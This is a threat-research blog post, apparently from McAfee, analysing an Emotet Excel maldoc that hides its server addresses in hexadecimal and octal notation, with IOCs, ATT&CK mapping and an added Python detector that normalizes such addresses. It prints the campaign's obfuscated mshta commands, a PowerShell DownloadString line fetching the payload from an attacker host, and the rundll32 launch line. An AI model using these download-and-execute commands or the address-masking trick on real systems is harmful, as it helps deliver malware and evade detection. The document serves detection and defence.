Emotet’s Unusual Strategy of Masking IP Addresses


Authored By: Kiran Raj
In a recent Emotet campaign, McAfee Researchers observed a change in tactics. The Emotet maldoc was using hexadecimal and octal formats to represent IP addresses, which are usually written in dotted-decimal format. Examples of each format are shown below:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 185.7.214.7
This change in format may evade some AV products that rely on inspecting command line parameters, but McAfee was still able to protect our customers. This blog explains this new technique.
Figure 1: Image of infection map for EMOTET Maldoc as observed by McAfee
Threat Summary

The initial attack vector is a phishing email with a Microsoft Excel attachment.
Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript fetched from a server via mshta.exe.
The malicious JavaScript further invokes PowerShell to download the Emotet payload.
The downloaded Emotet payload is executed by rundll32.exe and establishes a connection to the adversaries' command-and-control server.

Maldoc Analysis
Below is the image (figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On inspecting the Excel spreadsheet further, we can see a few cell addresses added in the Name Manager window. Cells referenced by the Auto_Open name are executed automatically when the workbook opens, resulting in malicious code execution.
Figure 3: Name Manager and Auto_Open triggers
Below are the commands used in the hexadecimal and octal variants of the maldocs.

FORMAT | OBFUSCATED CMD | DEOBFUSCATED CMD
Hexadecimal | cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html | http://185[.]7[.]214[.]7/fer/fer.html
Octal | cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html | http://46[.]105[.]81[.]76/c.html
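As an added example (not part of the McAfee write-up), the following Python normalizes the IPv4 literal forms shown above (a single 32-bit hex word, dotted octal, and also the mixed per-octet hex/octal/decimal forms that inet_aton-style parsers accept), strips the cmd.exe caret escapes, and flags any URL host in a command line that is not written in dotted decimal. The sample command lines are constructed from the two obfuscated commands in the table; the defanging brackets ([.] and [0x]) are removed before parsing so the defanged forms can be fed in directly.

```python
import re
import ipaddress

# Host portion of an http(s) URL: up to the next '/', quote or whitespace.
HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)

# Constructed sample command lines, modelled on the obfuscated commands above.
SAMPLE_CMDS = [
    "cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html",
    "cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html",
    "(New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png')",
]

def normalize_ip_literal(host):
    """Dotted-decimal form of an IPv4 literal in any notation inet_aton() accepts
    (0xb907d607, 0056.0151.0121.0114, ...); defanging brackets removed; None for names."""
    h = re.sub(r"[\[\]]", "", host.strip())
    if re.fullmatch(r"0[xX][0-9a-fA-F]{1,8}", h):      # one 32-bit hex word
        return str(ipaddress.IPv4Address(int(h, 16)))
    parts = h.split(".")
    if len(parts) != 4:
        return None
    octets = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]{1,2}", p):   # per-octet hex
            v = int(p, 16)
        elif re.fullmatch(r"0[0-7]+", p):               # leading zero = octal
            v = int(p, 8)
        elif re.fullmatch(r"0|[1-9][0-9]*", p):         # plain decimal
            v = int(p)
        else:
            return None
        if v > 255:
            return None
        octets.append(v)
    return ".".join(str(o) for o in octets)

def strip_carets(cmd):
    """Drop cmd.exe's '^' escape, used to split 'mshta' and 'http://'."""
    return cmd.replace("^", "")

def find_masked_hosts(cmd):
    """Return [(host as written, dotted decimal)] for URL hosts not in dotted decimal."""
    hits = []
    for m in HOST_RE.finditer(strip_carets(cmd)):
        host = m.group(1)
        normalized = normalize_ip_literal(host)
        if normalized and normalized != re.sub(r"[\[\]]", "", host):
            hits.append((host, normalized))
    return hits
```

Running find_masked_hosts over a process-creation log's command-line field gives the dotted-decimal address to match against blocklists, which the raw hex or octal string would miss.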

Execution
On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript, which is embedded in an HTML file.
Figure 4: Process tree of Excel execution
The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code.
Figure 5: Image of the HTML page seen in a browser
The malicious JavaScript invokes PowerShell to download the Emotet payload from "hxxp://185[.]7[.]214[.]7/fer/fer.png" to the following path: "C:\Users\Public\Documents\ssd.dll".

Command line:
(New-Object Net.WebClient).DownloadString('http://185[.]7[.]214[.]7/fer/fer.png')

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server.

Command line:
cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE | VALUE | SCANNER | DETECTION NAME
XLS | 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c | McAfee LiveSafe and Total Protection | X97M/Downloader.nn
DLL | a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 | McAfee LiveSafe and Total Protection | Emotet-FSY
HTML URL | http://185[.]7[.]214[.]7/fer/fer.html, http://46[.]105[.]81[.]76/c.html | WebAdvisor | Blocked
DLL URL | http://185[.]7[.]214[.]7/fer/fer.png, http://46[.]105[.]81[.]76/cc.png | WebAdvisor | Blocked

MITRE ATT&CK

TECHNIQUE ID | TACTIC | TECHNIQUE DETAILS | DESCRIPTION
T1566 | Initial Access | Phishing attachment | Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 | Execution | User Execution | Manual execution by user
T1071 | Command and Control | Standard Application Layer Protocol | Attempts to connect via HTTP
T1059 | Command and Scripting Interpreter | Starts CMD.EXE for command execution | Excel uses cmd and PowerShell to execute commands
T1218 | | Signed Binary Proxy Execution | Uses RUNDLL32.EXE and MSHTA.EXE to load library: rundll32 is used to run the downloaded payload, and mshta is used to execute the malicious JavaScript

Conclusion
Office documents have been used as an attack vector by many malware families in recent times. The threat actors behind these families are constantly changing their techniques in an attempt to evade detection. McAfee Researchers continually monitor the threat landscape to identify these changes in technique, so that our customers stay protected and can go about their daily lives without having to worry about these threats.